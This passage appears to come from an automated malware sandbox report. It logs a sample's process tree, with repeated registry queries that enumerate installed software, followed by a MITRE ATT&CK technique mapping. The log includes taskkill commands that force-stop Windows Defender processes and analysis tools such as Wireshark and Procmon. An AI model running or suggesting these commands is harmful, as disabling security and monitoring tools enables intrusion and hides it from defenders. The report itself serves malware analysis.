- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    3⤵
    PID:3312
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    3⤵
    PID:3636
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3708
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    3⤵
    PID:1916
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    3⤵
    PID:3416
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1812
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1864
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    3⤵
    PID:408
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    3⤵
    PID:2728
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:404
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    3⤵
    PID:3756
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    3⤵
    PID:2188
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1148
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    3⤵
    PID:3864
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    3⤵
    PID:2260
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:640
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:408
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
    3⤵
    PID:644
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3644
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:580
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
    3⤵
    PID:2956
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3972
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    3⤵
    PID:3528
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    3⤵
    PID:3184
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:408
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:3012
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:32
    3⤵
    PID:3528
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:580
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2156
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    3⤵
    PID:2188
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    3⤵
    PID:4108
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4128
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4164
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    3⤵
    PID:4184
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4204
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    3⤵
    PID:4240
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    3⤵
    PID:4260
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4280
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4316
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    3⤵
    PID:4336
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4356
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4392
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    3⤵
    PID:4412
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4432
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4468
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:32
    3⤵
    PID:4488
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4508
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4544
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    3⤵
    PID:4564
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4584
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4620
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    3⤵
    PID:4640
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4660
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4696
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    3⤵
    PID:4716
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4736
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4772
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:32
    3⤵
    PID:4792
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4812
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4848
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4868
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4888
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4948
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:5008
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4920
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5024
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:5060
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:5080
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5100
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4036
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
    3⤵
    PID:3956
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4112
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4144
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
    3⤵
    PID:4192
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4184
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4264
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
    3⤵
    PID:4296
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4344
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
    3⤵
    PID:4396
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:4416
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4448
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
    3⤵
    PID:4500
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
    3⤵
    PID:4560
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4568
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
    3⤵
    PID:4632
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
    3⤵
    PID:4652
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4700
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
    3⤵
    PID:4744
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
    3⤵
    PID:4776
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4808
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
    3⤵
    PID:4848
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
    3⤵
    PID:4896
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4952
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
    3⤵
    PID:5040
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
    3⤵
    PID:4992
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4964
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
    3⤵
    PID:5060
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
    3⤵
    PID:5108
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3984
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
    3⤵
    PID:4180
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
    3⤵
    PID:4144
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4220
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:64
    3⤵
    PID:4328
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:4404
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4396
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:64
    3⤵
    PID:4552
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:4544
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4620
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
    3⤵
    PID:4652
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:4788
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4796
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
    3⤵
    PID:4928
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:4996
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4956
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2188
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
    3⤵
    PID:4176
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:4164
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4288
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4556
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4652
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4940
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4988
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4332
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4560
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4804
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:688

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads